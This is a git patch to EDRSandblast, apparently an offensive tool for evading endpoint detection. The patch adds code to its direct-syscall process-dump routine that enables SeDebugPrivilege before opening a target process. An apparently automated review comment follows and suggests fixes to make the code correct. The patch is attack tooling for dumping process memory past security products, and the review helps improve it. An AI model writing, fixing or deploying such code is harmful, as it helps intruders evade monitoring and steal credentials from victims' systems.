From 77953c60bd75ba172d7ca9b5a45b249ad907c926 Mon Sep 17 00:00:00 2001
From: NK
Date: Thu, 2 Nov 2023 22:38:10 -0500
Subject: [PATCH] fix syscall dump method, enable sedebugprivilege
---
 EDRSandblast/Includes/SyscallProcessUtils.h | 4 +++-
 .../UserlandBypass/ProcessDumpDirectSyscalls.c | 13 ++++++++++++-
 2 files changed, 15 insertions(+), 2 deletions(-)
diff --git a/EDRSandblast/Includes/SyscallProcessUtils.h b/EDRSandblast/Includes/SyscallProcessUtils.h
index 0d5e2d5..705945b 100644
--- a/EDRSandblast/Includes/SyscallProcessUtils.h
+++ b/EDRSandblast/Includes/SyscallProcessUtils.h
@@ -10,4 +10,6 @@ PUNICODE_STRING SandGetProcessImage(HANDLE hProcess);
 DWORD SandGetProcessFilename(PUNICODE_STRING ProcessImageUnicodeStr, TCHAR* ImageFileName, DWORD nSize);
-DWORD SandFindProcessPidByName(TCHAR* targetProcessName, DWORD* pPid);
\ No newline at end of file
+DWORD SandFindProcessPidByName(TCHAR* targetProcessName, DWORD* pPid);
+
+BOOL SetPrivilege(HANDLE hToken, LPCTSTR lpszPrivilege, BOOL bEnablePrivilege);
\ No newline at end of file
diff --git a/EDRSandblast/UserlandBypass/ProcessDumpDirectSyscalls.c b/EDRSandblast/UserlandBypass/ProcessDumpDirectSyscalls.c
index c645c3b..2589d1b 100644
--- a/EDRSandblast/UserlandBypass/ProcessDumpDirectSyscalls.c
+++ b/EDRSandblast/UserlandBypass/ProcessDumpDirectSyscalls.c
@@ -402,7 +402,18 @@ DWORD SandMiniDumpWriteDump(TCHAR* targetProcessName, WCHAR* dumpFilePath) {
 InitializeObjectAttributes(&ObjectAttributesProcess, NULL, 0, NULL, NULL);
 CLIENT_ID clientId = { 0 };
 clientId.ProcessId = UlongToHandle(targetProcessPID);
-
+ HANDLE hToken;
+ if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken)) {
+ _tprintf_or_not(TEXT("[-] Unable to open process token. Error : %lu\n"), GetLastError());
+ goto cleanup;
+ }
+ if (SetPrivilege(hToken, L"SeDebugPrivilege", TRUE)) {
+ _tprintf_or_not(TEXT("[+] SeDebugPrivilege enabled\n"));
+ }
+ else {
+ _tprintf_or_not(TEXT("[-] Unable to enable SeDebugPrivilege\n"));
+ goto cleanup;
+ }
 status = NtOpenProcess(&htargetProcess, PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, &ObjectAttributesProcess, &clientId);
 if (status == STATUS_ACCESS_DENIED) {
 _tprintf_or_not(TEXT("[-] Syscall process dump failed: access denied error while trying to get an handle on the target process (NtOpenProcesserror 0x%x).\n"), status);
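Review bot: The token handle obtained by `OpenProcessToken` is never closed inside the hunk, on the success path or on the `goto cleanup` path after a failed `SetPrivilege`, and on the `OpenProcessToken` failure path `hToken` is still uninitialized when `goto cleanup` runs, so if the `cleanup` label (outside this hunk) closes it the call operates on an indeterminate value. Declare it as `HANDLE hToken = NULL;` and call `CloseHandle(hToken);` right after `SetPrivilege` returns, before either branch's `goto`; the adjusted privilege stays in effect on the process token once this handle is closed. As a point of style, `L"SeDebugPrivilege"` is a wide literal passed to an `LPCTSTR` parameter while the surrounding strings use `TEXT()`; the SDK constant `SE_DEBUG_NAME` is the TCHAR-correct spelling and avoids the mismatch in a non-Unicode build. The enclosing `SandMiniDumpWriteDump` function starts and ends outside the hunk.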